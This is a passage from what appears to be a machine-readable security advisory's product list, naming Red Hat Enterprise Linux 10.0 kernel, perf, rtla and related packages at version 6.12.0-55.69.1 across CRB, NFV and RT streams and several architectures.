"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
